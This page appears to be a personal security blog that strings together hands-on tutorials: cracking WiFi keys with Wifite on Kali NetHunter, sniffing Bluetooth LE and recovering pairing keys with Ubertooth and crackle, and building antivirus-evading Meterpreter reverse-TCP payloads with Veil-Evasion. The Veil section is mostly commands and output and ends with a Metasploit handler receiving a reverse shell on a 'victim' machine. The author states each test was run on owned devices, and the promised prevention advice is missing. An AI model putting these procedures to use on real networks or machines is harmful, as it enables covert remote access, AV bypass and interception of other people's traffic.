Sunday roundup for the 13th of March 2016. Hope your enjoying the original posts from this week!
Please contact me if you would like to be featured on security-sleuth.com.Read More
I wrote a post about installing Kali NetHunter a while back which you can read here building the hacker phone since then I have tested out quite a few features of the Kali NetHunter phone so I thought I would share a quick and easy wifi hacking tutorial with you all.
Even prior to launching this blog I had written at least 7 or 8 wifi hacking / web cracking posts and tutorials. I never published any of these tutorials due to the clunky / annoying but simple sequence of steps these kind of attacks were comprised of, I’m glad to see that Kali NetHunter and Wifite change all of this.
What you can do now with a mobile device in your pocket is verging on spectacular so without further ado lets go into the details.
Wifite is an automated wireless auditing script if you are familiar with using airmon and aircrack-ng wifi basically rolls up those tools and the process behind finding AP’s and automating penetration tests against them. In short it cuts out the complexity and manual work required when running these tools from the command line.
As always - remember running these attacks I have carried out all of the steps in this post on networks and devices I own and operate doing so anywhere else may be an offence.
Running wifite is very easy. to begin navigate to the Kali menu in your NetHunter phone and click “Launch wifite”. Now to progress further than this your going to have a your additional wireless adapter attached to your NetHunter device. Make sure you have a small adapter or one that uses very little energy in my earlier tests I wasn't able to get some larger adapters working with my NetHunter device.
First you will be asked which device you want to put into monitor mode you should put your external wifi adapter into monitor mode - this will most likely turn up as wlan1 where as your phones inbuilt will show up at wlan0. select the appropriate number to progress to the next step.
Based on your choice wifite will create a monitor mode interface which will just be listening for any traffic flowing through the ether.
Once its done scanning you should see a constantly refreshing list of ssid’s press Control + C to select which AP’s to attack.
Now list the numbers next to the AP’s you want to attacking watch wifite churn through them by running a combination of active and passive attacks to try and capture enough session into to decipher a wifi key.
Please note that in this example I attacked my own network and had devices authenticating and de-authenticating multiple times to generate this information quickly.
Unlike using wifite on a Kali desktop. NetHunter introduces a few additional steps into the equation after you have successfully captured enough info to start cracking an AP's password.
NetHunter will save your session as a .cap file. If for some reason you would like to go through your capture in a program like Wireshark for analysis you will need to convert them into .pcap files you can do that by going to the link here and uploading your .cap file:
From then on you can upload your .cap file to the Distributed WPA PSK auditor which is a service where people dedicate compute power to WPA cracking. you can upload your file by going to http://wpa-sec.stanev.org/?submit
Unfortunately since my wifi password is super complex none of these tools were able to crack it in a timely fashion :). But the below screen shows you what your end result should look like:
Its taken much longer than expected to get this simple tutorial published, between work and study it hasn't been easy to make enough time to get this post published. Thats said if this post proves popular I'd like to take the concept of wifi heists further in future posts by having multiple, tools tested and examined as well as offering some more in-depth scenarios perhaps via video? In closing I hope you found this tutorial useful or at least mildly entertaining, this is just one of the features Kali NetHunter offers there will be many more covered soon!
As always please let me know if found this article useful or if you didn't, Don’t forget to like this post or leave a comment below to let me know another area you would be interested in reading about. Thanks for your continued support! Until next time!
One of my favourite TV shows is Person of interest. I was just finishing up my Computer science degree when the show first started airing I was amazed at how the Reese and Finch managed to so easily bluejack unsuspecting “numbers”. In High school I has a range of Bluetooth sniffers installed on my trusty and highly customizable Sony Ericsson. Unfortunately by the time person of interest started airing everyone had either moved to android or the iPhone and Bluetooth sniffing was never the same.
Recently I purchased the Ubertooth One to see how much Bluetooth sniffing has changed since my high school days, this post documents my first attempts at Bluetooth sniffing / cracking with the Ubertooth One.
In order to be able to successfully set-up a Bluetooth sniffing system you will need the following:
You can perform these activities on just about every major desktop operating system but for this tutorial we focussed on running this with Kali Linux.
I caution you – there are a number of resources on the internet dedicated to setting up the Ubertooth One, this post included. After spending a day and a half attempting to get bluetooth sniffing working with absolutely zero background on the subject, my perseverance and can do attitude kicked in and I had the Ubertooth and associated scanning commands working like a charm. In order to save everybody the trouble here are the golden rules of getting the Ubertooth running on your machine:
One final tip make sure you have a range of additional Bluetooth tools you can use for Bluetooth debugging / sniffing if you’re having trouble with the install its good to have an arsenal of other tools you can use to verify if the issue you are experiencing is a configuration issue or a hardware issue.
Getting the Ubertooth One setup for Bluetooth sniffing isn’t the easiest activity to get up and running so I recommend before you go into any sniffing you walk through some of the Ubertooth Ones other capabilities i.e. spectrum analysis.
To get started make sure you have installed Kismet and spectools for spectrum analysis. To install kismet and spectools follow the commands below:
root@kali:~# git clone https://www.kismetwireless.net/spectools.git Cloning into 'spectools' root@kali:~# cd spectools root@kali:~/spectools# ./configure root@kali:~/spectools# make root@kali:~/spectools# make install
Now to run Spectools simply type:
Below are some screen caps of some of the Spectrum analysis I performed:
Once your Ubertooth is setup and configured you can run the following commands to analyse Bluetooth traffic.
hcitool is one of the default linux Bluetooth utilities when running it will return the MAC address and name of any Bluetooth devices in range:
root@kali:~# hcitool scan
One of the Ubertooth utilities is ubertooth-scan also allows you to passively monitor Bluetooth traffic – below is the command line usage:
root@kali:~# ubertooth-scan –s
The majority of the scanning work I undertook was with using ubertooth-btle. This allows you to capture Bluetooth traffic between Bluetooth low energy compatible devices this is becoming one of the preferred methods of Bluetooth communication between new devices, next time you’re in a store just look at the Bluetooth devices most of them should say Bluetooth-low energy compatible.
To run ubertooth-btle in promiscuous mode and output the contents int a pcap file simply run the command:
root@kali:~# ubertooth-btle –p –f -c capture.pcap
Below is a sample of what the btle packets look like when your run ubertooth-btle in promiscuous mode:
systime=1441512979 freq=2440 addr=8d651b4d delta_t=3.599 ms 86 9e d1 00 65 92 86 01 5d 3e 0e 5e 65 e0 61 9a 7d f7 04 c8 9f f5 45 00 ce f5 cc c8 8f 67 02 f5 4f a7 f5 Data / AA 8d651b4d (valid) / 30 bytes Channel Index: 17 LLID: 2 / LL Data PDU / L2CAP start NESN: 1 SN: 0 MD: 0 Data: d1 00 65 92 86 01 5d 3e 0e 5e 65 e0 61 9a 7d f7 04 c8 9f f5 45 00 ce f5 cc c8 8f 67 02 f5 CRC: 4f a7 f5 systime=1441512979 freq=2440 addr=72f844df delta_t=146.421 ms 01 00 9b 72 68 Data / AA 72f844df (valid) / 0 bytes Channel Index: 17 LLID: 1 / LL Data PDU / empty or L2CAP continuation NESN: 0 SN: 0 MD: 0 Data: CRC: 9b 72 68
If you want to follow a specific device you can use the command below where “00000000” would be the devices MAC address:
root@kali:~# ubertooth-btle –a 00000000
Crackle is an easy to use brute force cracking utility. Since most Bluetooth pairing codes which encrypt traffic between two devices are only 4-6 digits long they can be easily decrypted if the pairing between two devices is captured and this also allows you to listen in on future interactions between the two devices as we will show shortly, but fist lets walk through installing crackle which can be done by following the commands below:
root@kali:~# tar xf crackle-0.1.tgz root@kali:~# cd crackle-0.1 root@kali:~/crackle-0.1# ls aes.c aes-enc.c aes_i.h COPYING crackle.h README aes-ccm.c aes.h AUTHORS crackle.c Makefile test.c root@kali:~/crackle-0.1# make cc -Wall -Werror -g -c -o crackle.o crackle.c cc -Wall -Werror -g -c -o aes.o aes.c cc -Wall -Werror -g -c -o aes-ccm.o aes-ccm.c cc -Wall -Werror -g -c -o aes-enc.o aes-enc.c cc -Wall -Werror -g -c -o test.o test.c cc -o crackle crackle.o aes.o aes-ccm.o aes-enc.o test.o -lpcap root@kali:~/crackle-0.1# make install
Once crackle is installed we can begin walking through using crackle to decrypt pcap files with Bluetooth data on them. To do this simply run the following command on your desired pcap file:
root@kali:~/crackle-sample# crackle -i ltk_exchange.pcap -o decrypted.pcap TK found: 000000 ding ding ding, using a TK of 0! Just Cracks(tm) Warning: packet is too short to be encrypted (1), skipping LTK found: 7f62c053f104a5bbe68b1d896a2ed49c Done, processed 712 total packets, decrypted 3
Now to listen in on future communications between the two devices run the following command on a pcap file and supply the LTK value you discovered earlier:
root@kali:~/crackle-sample# crackle -i encrypted_known_ltk.pcap -o decrypted2.pcap -l 7f62c053f104a5bbe68b1d896a2ed49c Warning: packet is too short to be encrypted (1), skipping Warning: packet is too short to be encrypted (2), skipping Warning: could not decrypt packet! Copying as is.. Warning: could not decrypt packet! Copying as is.. Warning: could not decrypt packet! Copying as is.. Warning: invalid packet (length to long), skipping Done, processed 297 total packets, decrypted 7
With some of my own BLE captures there wasn’t enough packet info to run crackle successfully so I ran crackle with some sample files to give an overview of how the tool works.
Here are a few good resources you should check out:
Bluetooth, hopefully this article packages it up into a nice and easy digestible format as the process to get it to this level wasn’t that straight forward or error free.
As always please let me know if found this article useful or if you didn't, Don’t forget to like this post or leave a comment below to let me know another area you would be interested in reading about. Thanks for your continued support! Until next time!.
After my second post “Using Metasploit to Hack an Android Phone” which you can read here. I received an outpouring of positive feedback particularly on Twitter from a number of readers, one of the readers @pvtcussol asked if I had ever used the tool Veil, at that stage I hadn’t, but I promised as soon as I did use Veil I would document it all in a post, so @pvtcussol this one’s for you!
Veil is billed as a tool that is capable of bypassing antivirus solutions commonly deployed on end points during pen testing engagements. Veil does this by generating random and unique payloads for exploits, we can compare these payloads to polymorphic malware which changes as it moves from host to host giving them and advantage over traditional malware which has a distinct signature which can be picked up by most antivirus solutions. Veil’s exploits are compatible with popular penetration testing tool frameworks like Metasploit making them very easy to incorporate into your penetration testing toolkit.
A number of people have asked me why would you need such a powerful tool on a penetration test? There’s a number of reasons why you need tools such as these in penetration tests but I think the most significant reason is that skilled attackers for the most part will be using entirely custom exploits and tools, there’s a high probability that these attackers have made sure that the tools they are using are either undetectable by antivirus solutions or have some sort of mechanism that can disable antivirus. Effectively Veil makes sure that when you use it you are much stealthier and your customers are getting more for their money because your tools are capable of bypassing their first line of defence which wouldn’t stop a serious, dedicated and persistent attacker anyway.
With all of this in mind I decided to see how effective Veil was.
For This post I used the following devices and tools:
As for setup:
This example carries out all of the following activities on a single network. This example can be modified to work across multiple networks and on a range of devices.
As I do with any posts that involve powerful tools, disclaimer: I owned all of the devices used in this example. If you were to replicate this example with devices you do not own or do not have permission to use from the owner to use it may be a criminal offence.
After doing some research I found that setting up Veil is quite easy(most *nix users could do it) you basically need to run these four commands (from your home directory) As you will see below I performed the Veil installation from Kali Linux.
root@kali:~# wget https://codeload.github.com/Veil-Framework/Veil-Evasion/zip/master …. Output omitted …. 2015-02-08 18:47:11 (85.9 KB/s) - `master' saved [5490594/5490594] root@kali:~# unzip master …. Output omitted …. root@kali:~# cd Veil-Evasion-master/setup
Now you will run through a lengthy but simple setup process. A portion of the setup process involves some GUI steps, just click “Next”, “Agree” and “Finished” where appropriate.
root@kali:~/Veil-Evasion-master/setup# ./setup.sh …. Output omitted …. [*] Ensuring this account owns veil output directory...
So now Veil is installed you can try it out!
Immediately after installing Veil I decided to generate a payload, you do this by running a python script called “Veil-Evasion.py” so here it goes:
root@kali:~/Veil-Evasion-master/setup# cd .. root@kali:~/Veil-Evasion-master# ./Veil-Evasion.py
When starting up Veil, you see a simple straightforward menu, I decided to list all of the payloads first thing to see what was available, at the time of writing there was 39 payloads available but this will keep growing over time:
========================================================================= Veil-Evasion | [Version]: 2.16.0 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= Main Menu 39 payloads loaded Available commands: use use a specific payload info information on a specific payload list list available payloads update update Veil to the latest version clean clean out payload folders checkvt check payload hashes vs. VirusTotal exit exit Veil [>] Please enter a command: list ========================================================================= Veil-Evasion | [Version]: 2.16.0 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= [*] Available payloads: 1) auxiliary/coldwar_wrapper 2) auxiliary/pyinstaller_wrapper 3) c/meterpreter/rev_http 4) c/meterpreter/rev_http_service 5) c/meterpreter/rev_tcp 6) c/meterpreter/rev_tcp_service 7) c/shellcode_inject/flatc 8) cs/meterpreter/rev_http 9) cs/meterpreter/rev_https 10) cs/meterpreter/rev_tcp 11) cs/shellcode_inject/base64_substitution 12) cs/shellcode_inject/virtual 13) native/Hyperion 14) native/backdoor_factory 15) native/pe_scrambler 16) powershell/meterpreter/rev_http 17) powershell/meterpreter/rev_https 18) powershell/meterpreter/rev_tcp 19) powershell/shellcode_inject/download_virtual 20) powershell/shellcode_inject/psexec_virtual 21) powershell/shellcode_inject/virtual 22) python/meterpreter/rev_http 23) python/meterpreter/rev_http_contained 24) python/meterpreter/rev_https 25) python/meterpreter/rev_https_contained 26) python/meterpreter/rev_tcp 27) python/shellcode_inject/aes_encrypt 28) python/shellcode_inject/arc_encrypt 29) python/shellcode_inject/base64_substitution 30) python/shellcode_inject/des_encrypt 31) python/shellcode_inject/flat 32) python/shellcode_inject/letter_substitution 33) python/shellcode_inject/pidinject 34) ruby/meterpreter/rev_http 35) ruby/meterpreter/rev_http_contained 36) ruby/meterpreter/rev_https 37) ruby/meterpreter/rev_https_contained 38) ruby/meterpreter/rev_tcp 39) ruby/shellcode_inject/flat
After looking at the payloads the number I decided on using was 26 “the Meterpreter reverse TCP payload” mainly because I had used that payload before with Metasploit, but before I chose it I used the info command which gives you a neat little write up on the payload:
[>] Please enter a command: info 26 ========================================================================= Veil-Evasion | [Version]: 2.16.0 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= Payload information: Name: python/meterpreter/rev_tcp Language: python Rating: Excellent Description: pure windows/meterpreter/reverse_tcp stager, no shellcode Required Options: Name Current Value Description ---- ------------- ----------- LHOST IP of the metasploit handler LPORT 4444 Port of the metasploit handler compile_to_exe Y Compile to an executable expire_payload X Optional: Payloads expire after "X" days use_pyherion N Use the pyherion encrypter
To pick a payload to generate use the “use” command along with the number of the payload you would like to generate, after this you will set the LHOST (which should be the IP of the machine you are running Kali on) and then the generate command.
[>] Please enter a command: use 26 ========================================================================= Veil-Evasion | [Version]: 2.16.0 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= Payload: python/meterpreter/rev_tcp loaded Required Options: Name Current Value Description ---- ------------- ----------- LHOST IP of the metasploit handler LPORT 4444 Port of the metasploit handler compile_to_exe Y Compile to an executable expire_payload X Optional: Payloads expire after "X" days use_pyherion N Use the pyherion encrypter Available commands: set set a specific option value info show information about the payload generate generate payload back go to the main menu exit exit Veil [>] Please enter a command: set LHOST 192.168.0.14 [>] Please enter a command: generate
After hitting generate you will be prompted to set what type of output the generator produces and a name for the output:
========================================================================= Veil-Evasion | [Version]: 2.16.0 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= [*] Press [enter] for 'payload' [>] Please enter the base name for output files: testPayload [?] How would you like to create your payload executable? 1 - Pyinstaller (default) 2 - Pwnstaller (obfuscated Pyinstaller loader) 3 - Py2Exe [>] Please enter the number of your choice: 1 err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution. 130 INFO: wrote Z:\root\Veil-Evasion-master\testPayload.spec 176 INFO: Testing for ability to set icons, version resources... 189 INFO: ... resource update available 191 INFO: UPX is not available. 1707 INFO: checking Analysis 1707 INFO: building Analysis because out00-Analysis.toc non existent 1707 INFO: running Analysis out00-Analysis.toc 1709 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable 1717 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ... 1717 INFO: Found manifest C:\windows\WinSxS\Manifests\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375.manifest 1720 INFO: Searching for file msvcr90.dll 1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcr90.dll 1720 INFO: Searching for file msvcp90.dll 1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcp90.dll 1720 INFO: Searching for file msvcm90.dll 1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcm90.dll 1878 INFO: Analyzing Z:\opt\pyinstaller-2.0\support\_pyi_bootstrap.py 3434 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\archive.py 3625 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\carchive.py 3832 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\iu.py 3881 INFO: Analyzing /usr/share/veil-output/source/testPayload.py 4082 INFO: Hidden import 'encodings' has been found otherwise 4084 INFO: Looking for run-time hooks 4084 INFO: Analyzing rthook Z:\opt\pyinstaller-2.0\support/rthooks/pyi_rth_encodings.py 4904 INFO: Warnings written to Z:\root\Veil-Evasion-master\build\pyi.win32\testPayload\warntestPayload.txt 4911 INFO: checking PYZ 4911 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing 4911 INFO: building PYZ out00-PYZ.toc 5546 INFO: checking PKG 5546 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing 5546 INFO: building PKG out00-PKG.pkg 6628 INFO: checking EXE 6628 INFO: rebuilding out00-EXE.toc because testPayload.exe missing 6628 INFO: building EXE from out00-EXE.toc 6633 INFO: Appending archive to EXE Z:\root\Veil-Evasion-master\dist\testPayload.exe ========================================================================= Veil-Evasion | [Version]: 2.16.0 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= [*] Executable written to: /usr/share/veil-output/compiled/testPayload.exe Language: python Payload: python/meterpreter/rev_tcp Required Options: LHOST=192.168.0.14 LPORT=4444 compile_to_exe=Y expire_payload=X use_pyherion=N Payload File: /usr/share/veil-output/source/testPayload.py Handler File: /usr/share/veil-output/handlers/testPayload_handler.rc [*] Your payload files have been generated, don't get caught! [!] And don't submit samples to any online scanner! ;)
So with the payload generated let’s move on to see if it gets picked up by a scanner.
Going back to my post “Using Metasploit to Hack an Android Phone”. To get a Meterpreter session on an Android phone I had to craft a Metasploit payload and disguise it as an .apk file so I could install it and open up a Meterpreter session for Metasploit, as a force of habit I generally tend to keep the files and outputs I create when trying out new tools or working on potential blog posts, all of the materials from that post were kept on a flash drive that on every single occasion I plug it into my windows machine, I get the pop up below:
So this exercise really does show that Antivirus, despite what people say does provide some real value for users. But watch what happens when we scan a Veil payload:
After seeing the above results I still didn’t believe that it wasn’t returning even the slightest hint of a warning, so I also tried copying over the python files used to generate the malicious payload and scanning them, as you can see below, they also didn’t return any warnings:
Most Veil tutorials end here, where the author uploads the Veil payload to Virus Total or a similar service despite being told not too by the authors of Veil. In this example I’m not going to upload the file to any online services I am however going to go a step further and see how a veil payload interacts with Metasploit.
I wanted to see how Veil works, it also supplies a python handler to configure all of the Metasploit parameters but for this case I decided to do it manually. I typed in the necessary commands and accessed the victim machine via the Meterpreter session created by the payload (a quick note here, before you get any access to the target machine you have to make sure that the victim has run the Veil payload).
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.0.14 LHOST => 192.168.0.14 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse handler on 192.168.0.14:4444 [*] Starting the payload handler... msf exploit(handler) > [*] Sending stage (769536 bytes) to 192.168.0.30 [*] Meterpreter session 1 opened (192.168.0.14:4444 -> 192.168.0.30:1045) at 2015-02-14 10:30:28 +0000 msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1...
So after this session was ready I ran a few Meterpreter commands to verify Veil had successfully worked and had gave me a session on a remote PC:
meterpreter > pwd C:\Documents and Settings\victim\Desktop meterpreter > get uid [-] Unknown command: get. meterpreter > getuid Server username: XPTEST-0000000\victim meterpreter > idletime User has been idle for: 9 mins 7 secs meterpreter > ls Listing: C:\Documents and Settings\victim\Desktop ================================================ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2015-02-13 23:08:15 +0000 . 40777/rwxrwxrwx 0 dir 2014-07-13 04:44:45 +0000 .. 100666/rw-rw-rw- 28521 fil 2006-02-28 12:00:00 +0000 Blue hills.jpg 100777/rwxrwxrwx 3512798 fil 2015-02-08 20:38:14 +0000 testPayload.exe 100666/rw-rw-rw- 1400 fil 2015-02-08 20:37:04 +0000 testPayload.py 100666/rw-rw-rw- 143 fil 2015-02-08 20:37:04 +0000 testPayload_handler.rc meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4294967295 4 0 System x86 0 352 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe 560 668 alg.exe x86 0 C:\WINDOWS\System32\alg.exe 600 352 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe 624 352 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe 668 624 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe 680 624 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe 832 668 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe 912 668 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe 1004 1028 wscntfy.exe x86 0 XPTEST-0000000\victim C:\WINDOWS\system32\wscntfy.exe 1012 1676 cmd.exe x86 0 XPTEST-0000000\victim C:\WINDOWS\system32\cmd.exe 1028 668 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 1068 1028 wuauclt.exe x86 0 XPTEST-0000000\victim C:\WINDOWS\system32\wuauclt.exe 1108 668 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe 1184 668 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe 1192 1676 testPayload.exe x86 0 XPTEST-0000000\victim C:\Documents and Settings\victim\Desktop\testPayload.exe 1200 1192 testPayload.exe x86 0 XPTEST-0000000\victim C:\Documents and Settings\victim\Desktop\testPayload.exe 1388 668 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe 1496 668 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 1676 1624 explorer.exe x86 0 XPTEST-0000000\victim C:\WINDOWS\Explorer.EXE 1940 1676 ClamTray.exe x86 0 XPTEST-0000000\victim C:\Program Files\ClamWin\bin\ClamTray.exe
As you can see it worked!
Normally in this section I usually provide a brief rundown of protective and preventative measures to help stop the above from happening, I will do that but in addition to this I just want to say that I hope most small and medium businesses/organisations are seriously looking at more protection methods than just endpoint protection and firewalls because most of the tools out there are capable of bypassing those.
Now back to the prevention/protection methods:
Please let me know if found this article useful or if you didn't, leave a comment below to let me know another area you would be interested in reading posts about.
After some more advice from twitter instead of running metasploit and manually configuring the all of the exploit details, you can just do the following: